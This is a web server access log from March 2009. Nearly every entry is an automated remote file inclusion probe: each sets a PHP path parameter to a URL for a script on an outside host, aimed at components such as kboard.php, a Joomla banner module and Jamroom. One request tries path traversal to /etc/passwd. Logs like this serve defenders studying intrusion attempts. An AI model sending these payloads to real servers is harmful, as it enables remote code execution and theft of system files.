64.15.159.42 - - [07/Mar/2009:07:26:37 -0600] "GET /logs/access_log.1233619200//?DOCUMENT_ROOT=http://offthepitch.ca/copyright[1].txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
64.15.159.42 - - [07/Mar/2009:07:26:38 -0600] "GET /logs//?DOCUMENT_ROOT=http://offthepitch.ca/copyright[1].txt??? HTTP/1.1" 200 180672 "-""Mozilla/5.0"
64.15.159.42 - - [07/Mar/2009:07:26:39 -0600] "GET /logs/access_log.1233619200//?DOCUMENT_ROOT=http://offthepitch.ca/copyright[1].txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
64.15.159.42 - - [07/Mar/2009:07:26:39 -0600] "GET //?DOCUMENT_ROOT=http://offthepitch.ca/copyright[1].txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
64.15.159.42 - - [07/Mar/2009:07:26:40 -0600] "GET /logs//?DOCUMENT_ROOT=http://offthepitch.ca/copyright[1].txt??? HTTP/1.1" 200 180672 "-""Mozilla/5.0"
64.15.159.42 - - [07/Mar/2009:07:26:57 -0600] "GET /logs/access_log.1233619200//?DOCUMENT_ROOT=http://offthepitch.ca/copyright[1].txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
64.15.159.42 - - [07/Mar/2009:07:26:57 -0600] "GET //?DOCUMENT_ROOT=http://offthepitch.ca/copyright[1].txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
64.15.159.42 - - [07/Mar/2009:07:26:58 -0600] "GET /logs//?DOCUMENT_ROOT=http://offthepitch.ca/copyright[1].txt??? HTTP/1.1" 200 180672 "-""Mozilla/5.0"
80.67.26.159 - - [07/Mar/2009:07:28:37 -0600] "GET /logs/access_log.1233619200//?DOCUMENT_ROOT=http://offthepitch.ca/copyright[1].txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
80.67.26.159 - - [07/Mar/2009:07:28:43 -0600] "GET //?DOCUMENT_ROOT=http://offthepitch.ca/copyright[1].txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
80.67.26.159 - - [07/Mar/2009:07:28:44 -0600] "GET /logs//?DOCUMENT_ROOT=http://offthepitch.ca/copyright[1].txt??? HTTP/1.1" 200 180672 "-""Mozilla/5.0"
72.232.48.178 - - [07/Mar/2009:07:31:04 -0600] "GET /logs/access_log.1233619200//?DOCUMENT_ROOT=http://offthepitch.ca/copyright[1].txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
72.232.48.178 - - [07/Mar/2009:07:31:04 -0600] "GET //?DOCUMENT_ROOT=http://offthepitch.ca/copyright[1].txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
72.232.48.178 - - [07/Mar/2009:07:31:05 -0600] "GET /logs//?DOCUMENT_ROOT=http://offthepitch.ca/copyright[1].txt??? HTTP/1.1" 200 180672 "-""Mozilla/5.0"
124.217.242.70 - - [07/Mar/2009:07:32:57 -0600] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ydcommunity.com/board/data/idomila.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
124.217.242.70 - - [07/Mar/2009:07:32:58 -0600] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ydcommunity.com/board/data/idomila.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
78.129.138.184 - - [07/Mar/2009:07:33:16 -0600] "GET /logs/access_log.1233619200//?DOCUMENT_ROOT=http://www.tecsisnet-learning.it/FAD/copyright.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
78.129.138.184 - - [07/Mar/2009:07:33:16 -0600] "GET //?DOCUMENT_ROOT=http://www.tecsisnet-learning.it/FAD/copyright.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
78.129.138.184 - - [07/Mar/2009:07:33:17 -0600] "GET /logs//?DOCUMENT_ROOT=http://www.tecsisnet-learning.it/FAD/copyright.txt??? HTTP/1.1" 200 180672 "-""Mozilla/5.0"
203.97.30.12 - - [07/Mar/2009:07:40:16 -0600] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
203.97.30.12 - - [07/Mar/2009:07:40:16 -0600] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 294 "-""Mozilla/5.0"
203.97.30.12 - - [07/Mar/2009:07:40:16 -0600] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
203.97.30.12 - - [07/Mar/2009:07:40:16 -0600] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
203.97.30.12 - - [07/Mar/2009:07:40:16 -0600] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
203.97.30.12 - - [07/Mar/2009:07:40:16 -0600] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 294 "-""Mozilla/5.0"
203.97.30.12 - - [07/Mar/2009:07:40:21 -0600] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
203.97.30.12 - - [07/Mar/2009:07:40:21 -0600] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
203.97.30.12 - - [07/Mar/2009:07:40:21 -0600] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 294 "-""Mozilla/5.0"
203.97.30.12 - - [07/Mar/2009:07:40:23 -0600] "GET /logs/access_log.1229299200//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
203.97.30.12 - - [07/Mar/2009:07:40:24 -0600] "GET /logs/access_log.1229299200//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
203.97.30.12 - - [07/Mar/2009:07:40:30 -0600] "GET /logs/access_log.1229299200//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
213.251.169.156 - - [07/Mar/2009:07:43:06 -0600] "GET /logs//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://googlelinux.altervista.org/id.txt???? HTTP/1.1" 404 320 "-""libwww-perl/5.808"
213.251.169.156 - - [07/Mar/2009:07:43:06 -0600] "GET //includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://googlelinux.altervista.org/id.txt???? HTTP/1.1" 404 315 "-""libwww-perl/5.808"
72.52.213.40 - - [07/Mar/2009:07:43:16 -0600] "GET /logs//index.php?cmd&file=http://blog100.asia/survey//jpg/yes.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
72.52.213.40 - - [07/Mar/2009:07:43:16 -0600] "GET //index.php?cmd&file=http://blog100.asia/survey//jpg/yes.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
203.97.30.12 - - [07/Mar/2009:07:44:22 -0600] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
203.97.30.12 - - [07/Mar/2009:07:44:22 -0600] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
203.97.30.12 - - [07/Mar/2009:07:44:23 -0600] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 294 "-""Mozilla/5.0"
203.97.30.12 - - [07/Mar/2009:07:44:24 -0600] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 294 "-""Mozilla/5.0"
203.97.30.12 - - [07/Mar/2009:07:44:25 -0600] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 294 "-""Mozilla/5.0"
203.97.30.12 - - [07/Mar/2009:07:44:25 -0600] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
203.97.30.12 - - [07/Mar/2009:07:44:25 -0600] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
203.97.30.12 - - [07/Mar/2009:07:44:25 -0600] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
203.97.30.12 - - [07/Mar/2009:07:44:26 -0600] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
203.97.30.12 - - [07/Mar/2009:07:44:33 -0600] "GET /logs/access_log.1230249600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
203.97.30.12 - - [07/Mar/2009:07:44:36 -0600] "GET /logs/access_log.1230249600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
203.97.30.12 - - [07/Mar/2009:07:44:39 -0600] "GET /logs/access_log.1230249600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
65.254.49.34 - - [07/Mar/2009:07:44:51 -0600] "GET //index.php?cmd&file=http://imagehut.ws/images2/raid.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
65.254.49.34 - - [07/Mar/2009:07:44:51 -0600] "GET /logs//index.php?cmd&file=http://imagehut.ws/images2/raid.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
91.184.2.75 - - [07/Mar/2009:07:46:06 -0600] "GET /logs/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://nerdplx.freehostia.com/priv8/fx29id1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
91.184.2.75 - - [07/Mar/2009:07:46:06 -0600] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://nerdplx.freehostia.com/priv8/fx29id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
91.184.2.75 - - [07/Mar/2009:07:46:06 -0600] "GET /logs/access_log.1231977600/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://nerdplx.freehostia.com/priv8/fx29id1.txt?? HTTP/1.1" 404 375 "-""Mozilla/5.0"
208.71.89.60 - - [07/Mar/2009:07:49:24 -0600] "GET //?DOCUMENT_ROOT=http://www.tecsisnet-learning.it/FAD/copyright.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
208.71.89.60 - - [07/Mar/2009:07:49:25 -0600] "GET /logs/access_log.1233619200//?DOCUMENT_ROOT=http://www.tecsisnet-learning.it/FAD/copyright.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
208.71.89.60 - - [07/Mar/2009:07:49:25 -0600] "GET /logs//?DOCUMENT_ROOT=http://www.tecsisnet-learning.it/FAD/copyright.txt??? HTTP/1.1" 200 180672 "-""Mozilla/5.0"
91.93.97.106 - - [07/Mar/2009:07:50:13 -0600] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.dr52.co.kr//data/db/id3.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
91.93.97.106 - - [07/Mar/2009:07:50:13 -0600] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.dr52.co.kr//data/db/id3.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
91.93.97.106 - - [07/Mar/2009:07:50:18 -0600] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.dr52.co.kr//data/db/id2.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
209.85.105.25 - - [07/Mar/2009:07:50:20 -0600] "GET /logs/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://nerdplx.freehostia.com/priv8/fx29id1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
91.93.97.106 - - [07/Mar/2009:07:50:20 -0600] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.dr52.co.kr//data/db/id2.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
209.85.105.25 - - [07/Mar/2009:07:50:22 -0600] "GET /logs/access_log.1231977600/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://nerdplx.freehostia.com/priv8/fx29id1.txt?? HTTP/1.1" 404 375 "-""Mozilla/5.0"
209.85.105.25 - - [07/Mar/2009:07:50:32 -0600] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://nerdplx.freehostia.com/priv8/fx29id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
213.251.169.156 - - [07/Mar/2009:07:50:42 -0600] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://googlelinux.altervista.org/id.txt???? HTTP/1.1" 404 324 "-""libwww-perl/5.808"
213.251.169.156 - - [07/Mar/2009:07:50:42 -0600] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://googlelinux.altervista.org/id.txt???? HTTP/1.1" 404 319 "-""libwww-perl/5.808"
125.141.138.23 - - [07/Mar/2009:07:52:59 -0600] "GET /logs//update2.php?lang=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 300 "-""Mozilla/5.0"
125.141.138.23 - - [07/Mar/2009:07:52:59 -0600] "GET //update2.php?lang=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 295 "-""Mozilla/5.0"
125.141.138.23 - - [07/Mar/2009:07:52:59 -0600] "GET /logs/access_log.1232064000//update2.php?lang=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 322 "-""Mozilla/5.0"
77.221.130.17 - - [07/Mar/2009:07:53:01 -0600] "GET /Neos_Chronos/header.php?base_folder=http://harasin.brinkster.net/id.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
77.221.130.17 - - [07/Mar/2009:07:53:01 -0600] "GET /logs/Neos_Chronos/header.php?base_folder=http://harasin.brinkster.net/id.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
125.141.138.23 - - [07/Mar/2009:07:53:02 -0600] "GET /logs//update2.php?lang=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 300 "-""Mozilla/5.0"
125.141.138.23 - - [07/Mar/2009:07:53:02 -0600] "GET //update2.php?lang=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 295 "-""Mozilla/5.0"
125.141.138.23 - - [07/Mar/2009:07:53:02 -0600] "GET /logs/access_log.1232064000//update2.php?lang=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 322 "-""Mozilla/5.0"
77.221.130.17 - - [07/Mar/2009:07:53:03 -0600] "GET /logs/Neos_Chronos/header.php?base_folder=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
77.221.130.17 - - [07/Mar/2009:07:53:03 -0600] "GET /Neos_Chronos/header.php?base_folder=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 306 "-""libwww-perl/5.805"
125.141.138.23 - - [07/Mar/2009:07:53:07 -0600] "GET //update2.php?lang=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 295 "-""Mozilla/5.0"
125.141.138.23 - - [07/Mar/2009:07:53:07 -0600] "GET /logs//update2.php?lang=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 300 "-""Mozilla/5.0"
125.141.138.23 - - [07/Mar/2009:07:53:07 -0600] "GET /logs/access_log.1232064000//update2.php?lang=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 322 "-""Mozilla/5.0"
91.93.97.106 - - [07/Mar/2009:07:57:12 -0600] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.dr52.co.kr//data/db/idfx1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
91.93.97.106 - - [07/Mar/2009:07:57:12 -0600] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.dr52.co.kr//data/db/idfx1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
91.93.97.106 - - [07/Mar/2009:07:57:12 -0600] "GET /logs/access_log.1232496000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.dr52.co.kr//data/db/idfx1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
194.177.32.249 - - [07/Mar/2009:07:58:42 -0600] "GET ///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://guzelsanatlar.trakya.edu.tr/media/tz.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
58.226.23.129 - - [07/Mar/2009:07:59:17 -0600] "GET //ask_password.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
58.226.23.129 - - [07/Mar/2009:07:59:17 -0600] "GET /logs/access_log.1231718400//ask_password.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
58.226.23.129 - - [07/Mar/2009:07:59:17 -0600] "GET /logs//ask_password.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
91.93.97.106 - - [07/Mar/2009:07:59:24 -0600] "GET /logs/access_log.1230249600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.dr52.co.kr//data/db/idfx1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
58.226.23.55 - - [07/Mar/2009:07:59:27 -0600] "GET //ask_password.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
58.226.23.55 - - [07/Mar/2009:07:59:27 -0600] "GET /logs//ask_password.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
58.226.23.55 - - [07/Mar/2009:07:59:27 -0600] "GET /logs/access_log.1231718400//ask_password.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
58.226.23.55 - - [07/Mar/2009:07:59:40 -0600] "GET /logs/access_log.1232064000//ask_password.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
58.226.23.129 - - [07/Mar/2009:08:01:54 -0600] "GET /logs//ask_password.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
58.226.23.129 - - [07/Mar/2009:08:01:54 -0600] "GET /logs/access_log.1231718400//ask_password.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
58.226.23.129 - - [07/Mar/2009:08:01:54 -0600] "GET //ask_password.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
58.226.23.129 - - [07/Mar/2009:08:02:00 -0600] "GET /logs/access_log.1232064000//ask_password.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
211.202.2.220 - - [07/Mar/2009:08:05:23 -0600] "GET //admin/global.php?config[installdir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
211.202.2.220 - - [07/Mar/2009:08:05:23 -0600] "GET /logs/access_log.1233100800//admin/global.php?config[installdir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
211.202.2.220 - - [07/Mar/2009:08:05:23 -0600] "GET /logs//admin/global.php?config[installdir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
211.202.2.220 - - [07/Mar/2009:08:05:25 -0600] "GET /logs/access_log.1232841600//admin/global.php?config[installdir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
58.226.23.55 - - [07/Mar/2009:08:05:55 -0600] "GET /logs/access_log.1233100800//admin/global.php?config[installdir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
58.226.23.55 - - [07/Mar/2009:08:05:55 -0600] "GET //admin/global.php?config[installdir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
58.226.23.55 - - [07/Mar/2009:08:05:55 -0600] "GET /logs//admin/global.php?config[installdir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
58.226.23.55 - - [07/Mar/2009:08:05:55 -0600] "GET /logs/access_log.1232841600//admin/global.php?config[installdir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
58.226.23.55 - - [07/Mar/2009:08:05:57 -0600] "GET //admin/global.php?config[installdir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
58.226.23.55 - - [07/Mar/2009:08:05:57 -0600] "GET /logs//admin/global.php?config[installdir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
58.226.23.55 - - [07/Mar/2009:08:05:57 -0600] "GET /logs/access_log.1233100800//admin/global.php?config[installdir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
58.226.23.55 - - [07/Mar/2009:08:05:57 -0600] "GET /logs/access_log.1232841600//admin/global.php?config[installdir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
195.41.114.67 - - [07/Mar/2009:08:11:17 -0600] "GET /logs/access_log.1232841600//admin/global.php?config[installdir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
195.41.114.67 - - [07/Mar/2009:08:11:18 -0600] "GET /logs//admin/global.php?config[installdir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
195.41.114.67 - - [07/Mar/2009:08:11:18 -0600] "GET /logs/access_log.1233100800//admin/global.php?config[installdir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
195.41.114.67 - - [07/Mar/2009:08:11:18 -0600] "GET //admin/global.php?config[installdir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
195.41.114.67 - - [07/Mar/2009:08:11:32 -0600] "GET //admin/global.php?config[installdir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
195.41.114.67 - - [07/Mar/2009:08:11:32 -0600] "GET /logs//admin/global.php?config[installdir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
195.41.114.67 - - [07/Mar/2009:08:11:32 -0600] "GET /logs/access_log.1233100800//admin/global.php?config[installdir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
195.41.114.67 - - [07/Mar/2009:08:11:32 -0600] "GET /logs/access_log.1232841600//admin/global.php?config[installdir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
65.55.230.165 - - [07/Mar/2009:08:12:40 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.230.165 - - [07/Mar/2009:08:12:40 -0600] "GET /logs/access_log.1223856000 HTTP/1.1" 200 2397 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.134 - - [07/Mar/2009:08:12:50 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.134 - - [07/Mar/2009:08:12:50 -0600] "GET /logs/access_log.1137369600 HTTP/1.1" 200 333 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
67.19.130.218 - - [07/Mar/2009:08:12:54 -0600] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
67.19.130.218 - - [07/Mar/2009:08:12:54 -0600] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
67.19.130.218 - - [07/Mar/2009:08:12:54 -0600] "GET /logs/access_log.1233100800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
67.19.130.218 - - [07/Mar/2009:08:12:54 -0600] "GET /logs/access_log.1232841600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
65.55.208.134 - - [07/Mar/2009:08:13:18 -0600] "GET /logs/access_log.1187049600 HTTP/1.1" 200 2306 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
198.66.229.68 - - [07/Mar/2009:08:20:27 -0600] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom%5Bjm_dir%5D=http://vncgroup.com.br/fx29id.txt?? HTTP/1.0" 404 314 "-""Mozilla/5.0"
198.66.229.68 - - [07/Mar/2009:08:20:27 -0600] "GET /include/plugins/jrBrowser/purchase.php?jamroom%5Bjm_dir%5D=http://vncgroup.com.br/fx29id.txt?? HTTP/1.0" 404 309 "-""Mozilla/5.0"
198.66.229.68 - - [07/Mar/2009:08:20:27 -0600] "GET /logs/access_log.1233100800/include/plugins/jrBrowser/purchase.php?jamroom%5Bjm_dir%5D=http://vncgroup.com.br/fx29id.txt?? HTTP/1.0" 404 336 "-""Mozilla/5.0"
198.66.229.68 - - [07/Mar/2009:08:20:28 -0600] "GET /logs/access_log.1232841600/include/plugins/jrBrowser/purchase.php?jamroom%5Bjm_dir%5D=http://vncgroup.com.br/fx29id.txt?? HTTP/1.0" 404 336 "-""Mozilla/5.0"
165.194.27.141 - - [07/Mar/2009:08:20:49 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://swingtradesignal.com/b1ttletX.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
165.194.27.141 - - [07/Mar/2009:08:20:50 -0600] "GET //skin/zero_vote/error.php?dir=http://swingtradesignal.com/b1ttletX.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
211.202.2.220 - - [07/Mar/2009:08:21:37 -0600] "GET //?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
211.202.2.220 - - [07/Mar/2009:08:21:39 -0600] "GET /logs//?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 200 180672 "-""Mozilla/5.0"
211.202.2.220 - - [07/Mar/2009:08:21:41 -0600] "GET /logs/access_log.1232150400//?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
211.202.2.220 - - [07/Mar/2009:08:22:22 -0600] "GET /logs/access_log.1234569600//?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
72.89.191.101 - - [07/Mar/2009:08:24:39 -0600] "GET /logs///include/admin.lib.inc.php?site_path=http://www.hongik.ac.kr/~aqua/board/whitebbs/lol.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
72.89.191.101 - - [07/Mar/2009:08:24:39 -0600] "GET ///include/admin.lib.inc.php?site_path=http://www.hongik.ac.kr/~aqua/board/whitebbs/lol.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
91.93.97.106 - - [07/Mar/2009:08:25:23 -0600] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dr52.co.kr//data/db/id3.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.805"
